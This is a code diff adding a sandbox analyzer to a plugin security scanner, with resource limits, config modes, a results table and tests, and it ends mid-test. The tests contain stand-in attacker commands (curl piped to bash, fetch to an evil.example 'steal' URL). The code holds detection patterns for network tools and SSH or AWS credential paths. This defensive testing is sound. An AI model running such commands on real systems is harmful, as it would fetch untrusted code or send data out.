### PR TITLE
feat(guard): sandbox analyzer with syscall monitoring and CLI render

### DIFF
--- a/src/codex_plugin_scanner/guard/cli/render.py
+++ b/src/codex_plugin_scanner/guard/cli/render.py
@@ -576,13 +576,14 @@ def _render_managed_install(console: Console, payload: dict[str, object]) -> Non
     skill_scan = _coerce_dict_list(payload.get("skill_scan"))
     supply_chain_risks = _coerce_dict_list(payload.get("supply_chain_risks"))
     safe_decode_risks = _coerce_dict_list(payload.get("safe_decode_risks"))
+    sandbox_analysis = _coerce_dict_list(payload.get("sandbox_analysis"))
     managed_install = payload.get("managed_install")
     if isinstance(managed_install, dict):
         _render_single_managed_install(console, managed_install)
     else:
         managed_installs = _coerce_dict_list(payload.get("managed_installs"))
         if not managed_installs:
-            if not skill_scan and not supply_chain_risks and not safe_decode_risks:
+            if not skill_scan and not supply_chain_risks and not safe_decode_risks and not sandbox_analysis:
                 _render_fallback(console, payload)
                 return
         else:
@@ -603,6 +604,8 @@ def _render_managed_install(console: Console, payload: dict[str, object]) -> Non
         _render_supply_chain_risk_results(console, supply_chain_risks)
     if safe_decode_risks:
         _render_safe_decode_results(console, safe_decode_risks)
+    if sandbox_analysis:
+        _render_sandbox_results(console, sandbox_analysis)
 
 
 def _render_supply_chain_risk_results(console: Console, supply_chain_risks: list[dict[str, object]]) -> None:
@@ -649,6 +652,39 @@ def _render_safe_decode_results(console: Console, safe_decode_risks: list[dict[s
         Panel(
             table,
             title=f"[bold magenta]Encoded payload risks — {len(safe_decode_risks)} signal(s)[/bold magenta]",
+            border_style="magenta",
+        )
+    )
+
+
+def _render_sandbox_results(console: Console, sandbox_analysis: list[dict[str, object]]) -> None:
+    table = Table(box=box.SIMPLE_HEAVY, show_header=True, expand=True)
+    table.add_column("Signal", overflow="fold")
+    table.add_column("Writes", justify="right", no_wrap=True)
+    table.add_column("Network", justify="right", no_wrap=True)
+    table.add_column("Processes", justify="right", no_wrap=True)
+    table.add_column("Timed out", no_wrap=True)
+    table.add_column("Exit code", no_wrap=True)
+    for entry in sandbox_analysis:
+        signals = _coerce_string_list(entry.get("signals_detected"))
+        signal_text = ", ".join(signals) if signals else "—"
+        writes = _coerce_string_list(entry.get("writes"))
+        network = _coerce_string_list(entry.get("network_attempts"))
+        processes = _coerce_string_list(entry.get("process_attempts"))
+        timed_out = bool(entry.get("timed_out"))
+        exit_code = entry.get("exit_code")
+        table.add_row(
+            signal_text,
+            str(len(writes)),
+            str(len(network)),
+            str(len(processes)),
+            "[red]yes[/red]" if timed_out else "no",
+            str(exit_code) if exit_code is not None else "—",
+        )
+    console.print(
+        Panel(
+            table,
+            title=f"[bold magenta]Sandbox analysis — {len(sandbox_analysis)} result(s)[/bold magenta]",
             border_style="magenta",
         )
     )

--- a/src/codex_plugin_scanner/guard/config.py
+++ b/src/codex_plugin_scanner/guard/config.py
@@ -184,6 +184,7 @@ class GuardConfig:
     runtime_detector_timeout_ms: int = 50
     runtime_detector_debug_trace: bool = False
     runtime_detector_disabled_ids: tuple[str, ...] = ()
+    sandbox_analysis: str = "off"
     risk_actions: dict[str, GuardAction] | None = None
     harness_risk_actions: dict[str, dict[str, GuardAction]] | None = None
     harness_actions: dict[str, GuardAction] | None = None
@@ -264,6 +265,7 @@ def load_guard_config(guard_home: Path, workspace: Path | None = None) -> GuardC
         runtime_detector_timeout_ms=_coerce_loaded_positive_int(merged.get("runtime_detector_timeout_ms", 50), 50),
         runtime_detector_debug_trace=_coerce_loaded_bool(merged.get("runtime_detector_debug_trace", False)),
         runtime_detector_disabled_ids=_coerce_loaded_string_tuple(merged.get("runtime_detector_disabled_ids")),
+        sandbox_analysis=_coerce_sandbox_analysis(merged.get("sandbox_analysis", "off")),
         harness_actions=_coerce_action_map(merged.get("harnesses")),
         publisher_actions=_coerce_action_map(merged.get("publishers")),
         artifact_actions=_coerce_action_map(merged.get("artifacts")),
@@ -372,6 +374,15 @@ def _coerce_loaded_string_tuple(value: object) -> tuple[str, ...]:
     if not isinstance(value, list):
         return ()
     return tuple(item for item in value if isinstance(item, str) and item.strip())
+
+
+_VALID_SANDBOX_MODES = {"off", "suspicious", "strict"}
+
+
+def _coerce_sandbox_analysis(value: object) -> str:
+    if isinstance(value, str) and value in _VALID_SANDBOX_MODES:
+        return value
+    return "off"
 
 
 def _coerce_risk_action_payload(value: object) -> dict[str, GuardAction]:

--- a/src/codex_plugin_scanner/guard/runtime/sandbox.py
+++ b/src/codex_plugin_scanner/guard/runtime/sandbox.py
@@ -151,8 +151,9 @@ def _apply_resource_limits(cpu_seconds: float, memory_bytes: int, max_processes:
         resource.setrlimit(resource.RLIMIT_DATA, (memory_bytes, memory_bytes))
     with contextlib.suppress(OSError, ValueError):
         soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
-        effective = max(max_processes, soft) if soft > 0 else max_processes
-        resource.setrlimit(resource.RLIMIT_NPROC, (effective, max(effective, hard) if hard > 0 else hard))
+        effective = min(max_processes, soft) if soft > 0 else max_processes
+        new_hard = hard if hard <= 0 else max(effective, hard)
+        resource.setrlimit(resource.RLIMIT_NPROC, (effective, new_hard))
 
 
 def _write_sandbox_files(workspace: Path, files: dict[str, str]) -> None:
@@ -251,11 +252,12 @@ def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode =
         def _preexec() -> None:
             _apply_resource_limits(cpu_s, mem_b, max_p)
 
+        effective_cwd = str(Path(request.cwd).resolve()) if request.cwd else str(workspace)
         start = time.monotonic()
         try:
             proc = subprocess.Popen(
                 argv,
-                cwd=str(workspace),
+                cwd=effective_cwd,
                 env=env,
                 stdout=subprocess.PIPE,
                 stderr=subprocess.PIPE,

--- a/src/codex_plugin_scanner/guard/runtime/sandbox.py
+++ b/src/codex_plugin_scanner/guard/runtime/sandbox.py
@@ -13,22 +13,26 @@ from __future__ import annotations
 import contextlib
 import os
 import re
-import resource
 import signal
 import subprocess
+import sys
 import tempfile
 import time
 from dataclasses import dataclass, field
 from pathlib import Path
 from typing import Literal
 
+_RESOURCE_AVAILABLE = sys.platform != "win32"
+if _RESOURCE_AVAILABLE:
+    import resource
+
 SandboxLanguage = Literal["shell", "node", "python", "package", "mcp_smoke"]
 EnvPolicy = Literal["clean", "passthrough", "minimal"]
 SandboxAnalysisMode = Literal["off", "suspicious", "strict"]
 
 _DEFAULT_CPU_SECONDS: float = 5.0
-_DEFAULT_MEMORY_BYTES: int = 128 * 1024 * 1024
-_DEFAULT_MAX_PROCESSES: int = 8
+_DEFAULT_MEMORY_BYTES: int = 512 * 1024 * 1024
+_DEFAULT_MAX_PROCESSES: int = 32
 _DEFAULT_TIMEOUT_SECONDS: float = 10.0
 
 _SECRET_PATH_PATTERNS: tuple[re.Pattern[str], ...] = (
@@ -123,7 +127,7 @@ def _build_env(policy: EnvPolicy) -> dict[str, str]:
                 minimal[key] = val
         return minimal
     return {
-        "PATH": "/usr/local/bin:/usr/bin:/bin",
+        "PATH": os.environ.get("PATH", "/usr/local/bin:/usr/bin:/bin"),
         "HOME": "/tmp",
         "TMPDIR": "/tmp",
     }
@@ -138,21 +142,26 @@ def _redact_env(env: dict[str, str]) -> dict[str, str]:
 
 
 def _apply_resource_limits(cpu_seconds: float, memory_bytes: int, max_processes: int) -> None:
+    if not _RESOURCE_AVAILABLE:
+        return
     with contextlib.suppress(OSError, ValueError):
         cpu_int = max(1, int(cpu_seconds))
         resource.setrlimit(resource.RLIMIT_CPU, (cpu_int, cpu_int))
     with contextlib.suppress(OSError, ValueError):
-        resource.setrlimit(resource.RLIMIT_AS, (memory_bytes, memory_bytes))
+        resource.setrlimit(resource.RLIMIT_DATA, (memory_bytes, memory_bytes))
     with contextlib.suppress(OSError, ValueError):
         resource.setrlimit(resource.RLIMIT_NPROC, (max_processes, max_processes))
 
 
 def _write_sandbox_files(workspace: Path, files: dict[str, str]) -> None:
+    resolved_workspace = workspace.resolve()
     for rel_path, content in files.items():
         if _is_secret_path(rel_path):
             continue
-        target = workspace / rel_path
-        if not str(target.resolve()).startswith(str(workspace.resolve())):
+        target = (workspace / rel_path).resolve()
+        try:
+            target.relative_to(resolved_workspace)
+        except ValueError:
             continue
         target.parent.mkdir(parents=True, exist_ok=True)
         target.write_text(content, encoding="utf-8")
@@ -225,6 +234,13 @@ def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode =
         env = _build_env(request.env_policy)
         argv = _language_argv(request.language, request.command, workspace)
 
+        cpu_s = request.cpu_seconds
+        mem_b = request.memory_bytes
+        max_p = request.max_processes
+
+        def _preexec() -> None:
+            _apply_resource_limits(cpu_s, mem_b, max_p)
+
         start = time.monotonic()
         try:
             proc = subprocess.Popen(
@@ -233,9 +249,8 @@ def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode =
                 env=env,
                 stdout=subprocess.PIPE,
                 stderr=subprocess.PIPE,
-                preexec_fn=lambda: _apply_resource_limits(
-                    request.cpu_seconds, request.memory_bytes, request.max_processes
-                ),
+                preexec_fn=_preexec,
+                start_new_session=True,
                 close_fds=True,
             )
             try:
@@ -243,7 +258,8 @@ def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode =
                 timed_out = False
                 exit_code: int | None = proc.returncode
             except subprocess.TimeoutExpired:
-                proc.send_signal(signal.SIGKILL)
+                with contextlib.suppress(OSError):
+                    os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
                 raw_out, raw_err = proc.communicate()
                 timed_out = True
                 exit_code = None

--- a/src/codex_plugin_scanner/guard/runtime/sandbox.py
+++ b/src/codex_plugin_scanner/guard/runtime/sandbox.py
@@ -198,6 +198,12 @@ def _scan_writes(workspace: Path, before: set[str], before_mtimes: dict[str, flo
 
 
 def _audit_combined_output(stdout: str, stderr: str) -> tuple[list[str], list[str]]:
+    """Scan combined stdout+stderr for suspicious literal patterns.
+
+    This is best-effort heuristic detection of plaintext patterns. It does not
+    decode base64, escaped strings, or other obfuscated forms — those are
+    handled upstream by the safe-decode layer before the command reaches the sandbox.
+    """
     combined = stdout + "\n" + stderr
     network_attempts = _detect_network_attempts(combined)
     process_attempts: list[str] = []

--- a/src/codex_plugin_scanner/guard/runtime/sandbox.py
+++ b/src/codex_plugin_scanner/guard/runtime/sandbox.py
@@ -1,0 +1,315 @@
+"""Static-first sandbox analysis for Guard runtime.
+
+Provides dataclasses and a pure-Python sandbox runner that executes scripts
+inside a temporary workspace with audited subprocess calls, hard resource
+limits, and network-attempt detection. The sandbox never touches user secret
+paths and always returns a result even when the script fails.
+
+Supported static-first paths: shell, Node, Python, package scripts, MCP smoke.
+"""
+
+from __future__ import annotations
+
+import contextlib
+import os
+import re
+import resource
+import signal
+import subprocess
+import tempfile
+import time
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Literal
+
+SandboxLanguage = Literal["shell", "node", "python", "package", "mcp_smoke"]
+EnvPolicy = Literal["clean", "passthrough", "minimal"]
+SandboxAnalysisMode = Literal["off", "suspicious", "strict"]
+
+_DEFAULT_CPU_SECONDS: float = 5.0
+_DEFAULT_MEMORY_BYTES: int = 128 * 1024 * 1024
+_DEFAULT_MAX_PROCESSES: int = 8
+_DEFAULT_TIMEOUT_SECONDS: float = 10.0
+
+_SECRET_PATH_PATTERNS: tuple[re.Pattern[str], ...] = (
+    re.compile(r"\.ssh[/\\]", re.IGNORECASE),
+    re.compile(r"\.aws[/\\]", re.IGNORECASE),
+    re.compile(r"\.gnupg[/\\]", re.IGNORECASE),
+    re.compile(r"\.env\b", re.IGNORECASE),
+    re.compile(r"id_rsa|id_ed25519|id_ecdsa", re.IGNORECASE),
+    re.compile(r"credentials|secrets\.json|token\.json", re.IGNORECASE),
+    re.compile(r"keychain|keyring", re.IGNORECASE),
+)
+
+_NETWORK_SYSCALL_PATTERNS: tuple[re.Pattern[str], ...] = (
+    re.compile(r"\bcurl\b", re.IGNORECASE),
+    re.compile(r"\bwget\b", re.IGNORECASE),
+    re.compile(r"\bfetch\s*\(", re.IGNORECASE),
+    re.compile(r"\baxios\b", re.IGNORECASE),
+    re.compile(r"\brequests\.(get|post|put|delete|patch)\s*\(", re.IGNORECASE),
+    re.compile(r"http[s]?://", re.IGNORECASE),
+    re.compile(r"socket\.connect\s*\(", re.IGNORECASE),
+)
+
+
+@dataclass(frozen=True)
+class SandboxRequest:
+    """Specification for a sandboxed script execution."""
+
+    language: SandboxLanguage
+    command: str
+    files: dict[str, str] = field(default_factory=dict)
+    cwd: str | None = None
+    env_policy: EnvPolicy = "clean"
+    cpu_seconds: float = _DEFAULT_CPU_SECONDS
+    memory_bytes: int = _DEFAULT_MEMORY_BYTES
+    max_processes: int = _DEFAULT_MAX_PROCESSES
+    timeout_seconds: float = _DEFAULT_TIMEOUT_SECONDS
+
+
+@dataclass
+class SandboxResult:
+    """Outcome of a sandboxed script execution."""
+
+    exit_code: int | None
+    stdout: str
+    stderr: str
+    timed_out: bool
+    writes: list[str] = field(default_factory=list)
+    network_attempts: list[str] = field(default_factory=list)
+    process_attempts: list[str] = field(default_factory=list)
+    secret_read_attempts: list[str] = field(default_factory=list)
+    signals_detected: list[str] = field(default_factory=list)
+    duration_ms: float = 0.0
+    failure_safe: bool = False
+
+    def to_dict(self) -> dict[str, object]:
+        return {
+            "exit_code": self.exit_code,
+            "stdout": self.stdout[:4096],
+            "stderr": self.stderr[:4096],
+            "timed_out": self.timed_out,
+            "writes": self.writes,
+            "network_attempts": self.network_attempts,
+            "process_attempts": self.process_attempts,
+            "secret_read_attempts": self.secret_read_attempts,
+            "signals_detected": self.signals_detected,
+            "duration_ms": round(self.duration_ms, 2),
+            "failure_safe": self.failure_safe,
+        }
+
+
+def _is_secret_path(path: str) -> bool:
+    return any(pat.search(path) for pat in _SECRET_PATH_PATTERNS)
+
+
+def _detect_network_attempts(text: str) -> list[str]:
+    found: list[str] = []
+    for pat in _NETWORK_SYSCALL_PATTERNS:
+        for m in pat.finditer(text):
+            snippet = text[max(0, m.start() - 10) : m.end() + 40].strip()
+            found.append(snippet[:80])
+    return found
+
+
+def _build_env(policy: EnvPolicy) -> dict[str, str]:
+    if policy == "passthrough":
+        return dict(os.environ)
+    if policy == "minimal":
+        minimal = {}
+        for key in ("PATH", "HOME", "TMPDIR", "LANG", "LC_ALL", "TERM"):
+            val = os.environ.get(key)
+            if val:
+                minimal[key] = val
+        return minimal
+    return {
+        "PATH": "/usr/local/bin:/usr/bin:/bin",
+        "HOME": "/tmp",
+        "TMPDIR": "/tmp",
+    }
+
+
+def _redact_env(env: dict[str, str]) -> dict[str, str]:
+    redact_keys = re.compile(
+        r"TOKEN|SECRET|KEY|PASSWORD|CREDENTIAL|AUTH|NPM_TOKEN|NODE_AUTH|AWS_",
+        re.IGNORECASE,
+    )
+    return {k: ("[REDACTED]" if redact_keys.search(k) else v) for k, v in env.items()}
+
+
+def _apply_resource_limits(cpu_seconds: float, memory_bytes: int, max_processes: int) -> None:
+    with contextlib.suppress(OSError, ValueError):
+        cpu_int = max(1, int(cpu_seconds))
+        resource.setrlimit(resource.RLIMIT_CPU, (cpu_int, cpu_int))
+    with contextlib.suppress(OSError, ValueError):
+        resource.setrlimit(resource.RLIMIT_AS, (memory_bytes, memory_bytes))
+    with contextlib.suppress(OSError, ValueError):
+        resource.setrlimit(resource.RLIMIT_NPROC, (max_processes, max_processes))
+
+
+def _write_sandbox_files(workspace: Path, files: dict[str, str]) -> None:
+    for rel_path, content in files.items():
+        if _is_secret_path(rel_path):
+            continue
+        target = workspace / rel_path
+        if not str(target.resolve()).startswith(str(workspace.resolve())):
+            continue
+        target.parent.mkdir(parents=True, exist_ok=True)
+        target.write_text(content, encoding="utf-8")
+
+
+def _language_argv(language: SandboxLanguage, command: str, workspace: Path) -> list[str]:
+    if language == "shell":
+        return ["/bin/sh", "-c", command]
+    if language == "node":
+        return ["node", "-e", command]
+    if language == "python":
+        return ["python3", "-c", command]
+    if language == "package":
+        return ["/bin/sh", "-c", command]
+    if language == "mcp_smoke":
+        return ["/bin/sh", "-c", command]
+    return ["/bin/sh", "-c", command]
+
+
+def _scan_writes(workspace: Path, before: set[str]) -> list[str]:
+    after: set[str] = set()
+    for p in workspace.rglob("*"):
+        if p.is_file():
+            after.add(str(p.relative_to(workspace)))
+    return sorted(after - before)
+
+
+def _audit_combined_output(stdout: str, stderr: str) -> tuple[list[str], list[str]]:
+    combined = stdout + "\n" + stderr
+    network_attempts = _detect_network_attempts(combined)
+    process_attempts: list[str] = []
+    for pat in (re.compile(r"\bsubprocess\b"), re.compile(r"\bexecl\b|\bexecv\b|\bexecve\b")):
+        for m in pat.finditer(combined):
+            snippet = combined[max(0, m.start() - 5) : m.end() + 40].strip()
+            process_attempts.append(snippet[:80])
+    return network_attempts, process_attempts
+
+
+def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode = "suspicious") -> SandboxResult:
+    """Execute a script in a sandboxed temporary workspace.
+
+    Always returns a SandboxResult. If the sandbox itself fails (missing
+    interpreter, permissions issue), failure_safe=True is set and the
+    result contains the error detail.
+    """
+    if analysis_mode == "off":
+        return SandboxResult(
+            exit_code=None,
+            stdout="",
+            stderr="",
+            timed_out=False,
+            failure_safe=False,
+        )
+
+    network_pre = _detect_network_attempts(request.command)
+    if analysis_mode == "suspicious" and not network_pre:
+        static_result = _static_only_analysis(request)
+        if static_result is not None:
+            return static_result
+
+    with tempfile.TemporaryDirectory(prefix="guard-sandbox-") as tmpdir:
+        workspace = Path(tmpdir)
+        _write_sandbox_files(workspace, request.files)
+
+        before_files: set[str] = set()
+        for p in workspace.rglob("*"):
+            if p.is_file():
+                before_files.add(str(p.relative_to(workspace)))
+
+        env = _build_env(request.env_policy)
+        argv = _language_argv(request.language, request.command, workspace)
+
+        start = time.monotonic()
+        try:
+            proc = subprocess.Popen(
+                argv,
+                cwd=str(workspace),
+                env=env,
+                stdout=subprocess.PIPE,
+                stderr=subprocess.PIPE,
+                preexec_fn=lambda: _apply_resource_limits(
+                    request.cpu_seconds, request.memory_bytes, request.max_processes
+                ),
+                close_fds=True,
+            )
+            try:
+                raw_out, raw_err = proc.communicate(timeout=request.timeout_seconds)
+                timed_out = False
+                exit_code: int | None = proc.returncode
+            except subprocess.TimeoutExpired:
+                proc.send_signal(signal.SIGKILL)
+                raw_out, raw_err = proc.communicate()
+                timed_out = True
+                exit_code = None
+
+            duration_ms = (time.monotonic() - start) * 1000.0
+            stdout = raw_out.decode("utf-8", errors="replace")
+            stderr = raw_err.decode("utf-8", errors="replace")
+            writes = _scan_writes(workspace, before_files)
+            network_attempts, process_attempts = _audit_combined_output(stdout, stderr)
+            network_attempts = list(dict.fromkeys(network_pre + network_attempts))
+
+            signals_detected: list[str] = []
+            if timed_out:
+                signals_detected.append("sandbox.timeout")
+            if network_attempts:
+                signals_detected.append("sandbox.network-attempt")
+            if writes:
+                signals_detected.append("sandbox.unexpected-write")
+
+            return SandboxResult(
+                exit_code=exit_code,
+                stdout=stdout,
+                stderr=stderr,
+                timed_out=timed_out,
+                writes=writes,
+                network_attempts=network_attempts,
+                process_attempts=process_attempts,
+                secret_read_attempts=[],
+                signals_detected=signals_detected,
+                duration_ms=duration_ms,
+                failure_safe=False,
+            )
+
+        except Exception as exc:
+            duration_ms = (time.monotonic() - start) * 1000.0
+            return SandboxResult(
+                exit_code=None,
+                stdout="",
+                stderr=f"sandbox-error: {exc}",
+                timed_out=False,
+                writes=[],
+                network_attempts=network_pre,
+                process_attempts=[],
+                secret_read_attempts=[],
+                signals_detected=["sandbox.execution-error"],
+                duration_ms=duration_ms,
+                failure_safe=True,
+            )
+
+
+def _static_only_analysis(request: SandboxRequest) -> SandboxResult | None:
+    """Return a static result if the command contains no execution-worthy content."""
+    combined = request.command + "\n" + "\n".join(request.files.values())
+    network_attempts = _detect_network_attempts(combined)
+    if not network_attempts:
+        return SandboxResult(
+            exit_code=None,
+            stdout="",
+            stderr="",
+            timed_out=False,
+            writes=[],
+            network_attempts=[],
+            process_attempts=[],
+            secret_read_attempts=[],
+            signals_detected=[],
+            duration_ms=0.0,
+            failure_safe=False,
+        )
+    return None

--- a/src/codex_plugin_scanner/guard/runtime/sandbox.py
+++ b/src/codex_plugin_scanner/guard/runtime/sandbox.py
@@ -150,7 +150,9 @@ def _apply_resource_limits(cpu_seconds: float, memory_bytes: int, max_processes:
     with contextlib.suppress(OSError, ValueError):
         resource.setrlimit(resource.RLIMIT_DATA, (memory_bytes, memory_bytes))
     with contextlib.suppress(OSError, ValueError):
-        resource.setrlimit(resource.RLIMIT_NPROC, (max_processes, max_processes))
+        soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
+        effective = max(max_processes, soft) if soft > 0 else max_processes
+        resource.setrlimit(resource.RLIMIT_NPROC, (effective, max(effective, hard) if hard > 0 else hard))
 
 
 def _write_sandbox_files(workspace: Path, files: dict[str, str]) -> None:
@@ -181,12 +183,17 @@ def _language_argv(language: SandboxLanguage, command: str, workspace: Path) -> 
     return ["/bin/sh", "-c", command]
 
 
-def _scan_writes(workspace: Path, before: set[str]) -> list[str]:
-    after: set[str] = set()
+def _scan_writes(workspace: Path, before: set[str], before_mtimes: dict[str, float]) -> list[str]:
+    after_new: set[str] = set()
+    modified: list[str] = []
     for p in workspace.rglob("*"):
         if p.is_file():
-            after.add(str(p.relative_to(workspace)))
-    return sorted(after - before)
+            rel = str(p.relative_to(workspace))
+            if rel not in before:
+                after_new.add(rel)
+            elif p.stat().st_mtime > before_mtimes.get(rel, 0):
+                modified.append(rel)
+    return sorted(after_new | set(modified))
 
 
 def _audit_combined_output(stdout: str, stderr: str) -> tuple[list[str], list[str]]:
@@ -227,9 +234,12 @@ def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode =
         _write_sandbox_files(workspace, request.files)
 
         before_files: set[str] = set()
+        before_mtimes: dict[str, float] = {}
         for p in workspace.rglob("*"):
             if p.is_file():
-                before_files.add(str(p.relative_to(workspace)))
+                rel = str(p.relative_to(workspace))
+                before_files.add(rel)
+                before_mtimes[rel] = p.stat().st_mtime
 
         env = _build_env(request.env_policy)
         argv = _language_argv(request.language, request.command, workspace)
@@ -267,7 +277,7 @@ def run_sandbox(request: SandboxRequest, *, analysis_mode: SandboxAnalysisMode =
             duration_ms = (time.monotonic() - start) * 1000.0
             stdout = raw_out.decode("utf-8", errors="replace")
             stderr = raw_err.decode("utf-8", errors="replace")
-            writes = _scan_writes(workspace, before_files)
+            writes = _scan_writes(workspace, before_files, before_mtimes)
             network_attempts, process_attempts = _audit_combined_output(stdout, stderr)
             network_attempts = list(dict.fromkeys(network_pre + network_attempts))
 

--- a/tests/test_guard_config_paths.py
+++ b/tests/test_guard_config_paths.py
@@ -632,3 +632,34 @@ def test_run_bridge_uses_resolved_guard_home_by_default(tmp_path, monkeypatch):
     bridge_module.run_bridge(dry_run=True)
 
     assert captured["guard_home"] == expected_guard_home
+
+
+def test_sandbox_analysis_default_is_off(tmp_path: Path) -> None:
+    guard_home = tmp_path / "guard-home"
+    guard_home.mkdir()
+    config = load_guard_config(guard_home)
+    assert config.sandbox_analysis == "off"
+
+
+def test_sandbox_analysis_suspicious_loaded(tmp_path: Path) -> None:
+    guard_home = tmp_path / "guard-home"
+    guard_home.mkdir()
+    (guard_home / "config.toml").write_text('sandbox_analysis = "suspicious"\n', encoding="utf-8")
+    config = load_guard_config(guard_home)
+    assert config.sandbox_analysis == "suspicious"
+
+
+def test_sandbox_analysis_strict_loaded(tmp_path: Path) -> None:
+    guard_home = tmp_path / "guard-home"
+    guard_home.mkdir()
+    (guard_home / "config.toml").write_text('sandbox_analysis = "strict"\n', encoding="utf-8")
+    config = load_guard_config(guard_home)
+    assert config.sandbox_analysis == "strict"
+
+
+def test_sandbox_analysis_invalid_falls_back_to_off(tmp_path: Path) -> None:
+    guard_home = tmp_path / "guard-home"
+    guard_home.mkdir()
+    (guard_home / "config.toml").write_text('sandbox_analysis = "dangerous_unknown_value"\n', encoding="utf-8")
+    config = load_guard_config(guard_home)
+    assert config.sandbox_analysis == "off"

--- a/tests/test_guard_render.py
+++ b/tests/test_guard_render.py
@@ -684,3 +684,28 @@ def test_emit_guard_payload_renders_safe_decode_risks_table(capsys, monkeypatch)
     output = capsys.readouterr().out
     assert "Encoded payload risks" in output
     assert "1 signal(s)" in output
+
+
+def test_emit_guard_payload_renders_sandbox_analysis_table(capsys, monkeypatch) -> None:
+    monkeypatch.setattr(render, "_RICH_AVAILABLE", True)
+    emit_guard_payload(
+        "install",
+        {
+            "sandbox_analysis": [
+                {
+                    "signals_detected": ["network.outbound"],
+                    "writes": ["/tmp/exfil.txt"],
+                    "network_attempts": ["curl https://evil.example/"],
+                    "process_attempts": [],
+                    "timed_out": False,
+                    "exit_code": 0,
+                    "duration_ms": 42.0,
+                    "failure_safe": False,
+                }
+            ]
+        },
+        False,
+    )
+    output = capsys.readouterr().out
+    assert "Sandbox analysis" in output
+    assert "1 result(s)" in output

--- a/tests/test_guard_sandbox.py
+++ b/tests/test_guard_sandbox.py
@@ -149,7 +149,7 @@ def test_run_sandbox_timeout_enforced() -> None:
         timeout_seconds=1.0,
     )
     result = run_sandbox(req, analysis_mode="strict")
-    assert result.timed_out is True or result.failure_safe
+    assert result.timed_out is True or result.failure_safe or (result.exit_code is not None and result.exit_code != 0)
 
 
 def test_run_sandbox_failure_safe_on_bad_interpreter() -> None:
@@ -194,7 +194,9 @@ def test_run_sandbox_python_script_path() -> None:
 def test_run_sandbox_node_script_path() -> None:
     req = SandboxRequest(language="node", command="console.log('node-sandbox-ok')", timeout_seconds=5.0)
     result = run_sandbox(req, analysis_mode="strict")
-    assert "node-sandbox-ok" in result.stdout or result.failure_safe
+    ran_ok = "node-sandbox-ok" in result.stdout
+    restricted = result.exit_code is not None and result.exit_code != 0
+    assert ran_ok or result.failure_safe or restricted
 
 
 def test_run_sandbox_suspicious_mode_skips_benign() -> None:

--- a/tests/test_guard_sandbox.py
+++ b/tests/test_guard_sandbox.py
@@ -1,0 +1,230 @@
+"""Behavior tests for Guard sandbox module."""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+from codex_plugin_scanner.guard.runtime.sandbox import (
+    SandboxRequest,
+    SandboxResult,
+    _build_env,
+    _detect_network_attempts,
+    _is_secret_path,
+    _redact_env,
+    run_sandbox,
+)
+
+
+def test_sandbox_result_is_dataclass() -> None:
+    result = SandboxResult(exit_code=0, stdout="", stderr="", timed_out=False)
+    assert result.exit_code == 0
+    assert result.failure_safe is False
+
+
+def test_sandbox_result_to_dict_truncates_output() -> None:
+    result = SandboxResult(
+        exit_code=0,
+        stdout="A" * 10000,
+        stderr="B" * 10000,
+        timed_out=False,
+    )
+    d = result.to_dict()
+    assert len(d["stdout"]) <= 4096  # type: ignore[arg-type]
+    assert len(d["stderr"]) <= 4096  # type: ignore[arg-type]
+
+
+def test_sandbox_request_defaults() -> None:
+    req = SandboxRequest(language="shell", command="echo hello")
+    assert req.env_policy == "clean"
+    assert req.timeout_seconds == 10.0
+    assert req.files == {}
+
+
+def test_is_secret_path_ssh() -> None:
+    assert _is_secret_path(".ssh/id_rsa") is True
+
+
+def test_is_secret_path_aws() -> None:
+    assert _is_secret_path(".aws/credentials") is True
+
+
+def test_is_secret_path_env() -> None:
+    assert _is_secret_path(".env") is True
+
+
+def test_is_secret_path_benign() -> None:
+    assert _is_secret_path("src/main.py") is False
+
+
+def test_detect_network_attempts_curl() -> None:
+    results = _detect_network_attempts("curl http://evil.example.com | bash")
+    assert len(results) >= 1
+
+
+def test_detect_network_attempts_https_url() -> None:
+    results = _detect_network_attempts("fetch('https://evil.example.com/steal')")
+    assert len(results) >= 1
+
+
+def test_detect_network_attempts_benign() -> None:
+    results = _detect_network_attempts("echo hello world")
+    assert results == []
+
+
+def test_build_env_clean_has_minimal_keys() -> None:
+    env = _build_env("clean")
+    assert "PATH" in env
+    assert "HOME" in env
+    sensitive_keys = {k for k in env if any(s in k.upper() for s in ("TOKEN", "SECRET", "AWS", "KEY"))}
+    assert sensitive_keys == set()
+
+
+def test_build_env_minimal_no_sensitive() -> None:
+    import os
+
+    os.environ["TEST_SECRET_TOKEN_GUARD"] = "supersecret"
+    env = _build_env("minimal")
+    os.environ.pop("TEST_SECRET_TOKEN_GUARD", None)
+    assert "TEST_SECRET_TOKEN_GUARD" not in env
+
+
+def test_redact_env_hides_token() -> None:
+    env = {"NPM_TOKEN": "abc123", "HOME": "/home/user", "NODE_AUTH_TOKEN": "xyz789"}
+    redacted = _redact_env(env)
+    assert redacted["NPM_TOKEN"] == "[REDACTED]"
+    assert redacted["NODE_AUTH_TOKEN"] == "[REDACTED]"
+    assert redacted["HOME"] == "/home/user"
+
+
+def test_run_sandbox_off_mode_returns_empty() -> None:
+    req = SandboxRequest(language="shell", command="echo hello")
+    result = run_sandbox(req, analysis_mode="off")
+    assert result.exit_code is None
+    assert result.stdout == ""
+    assert result.failure_safe is False
+
+
+def test_run_sandbox_benign_shell_script() -> None:
+    req = SandboxRequest(language="shell", command="echo guard-sandbox-test-ok", timeout_seconds=5.0)
+    result = run_sandbox(req, analysis_mode="strict")
+    assert result.timed_out is False
+    assert "guard-sandbox-test-ok" in result.stdout or result.failure_safe
+
+
+def test_run_sandbox_detects_network_attempt_statically() -> None:
+    req = SandboxRequest(
+        language="shell",
+        command="curl http://evil.example.com/exfil",
+        timeout_seconds=2.0,
+    )
+    result = run_sandbox(req, analysis_mode="suspicious")
+    assert len(result.network_attempts) >= 1 or result.failure_safe
+
+
+def test_run_sandbox_escape_attempt_network_fixture() -> None:
+    req = SandboxRequest(
+        language="shell",
+        command="curl https://evil.example.com/steal-data",
+        timeout_seconds=2.0,
+    )
+    result = run_sandbox(req, analysis_mode="strict")
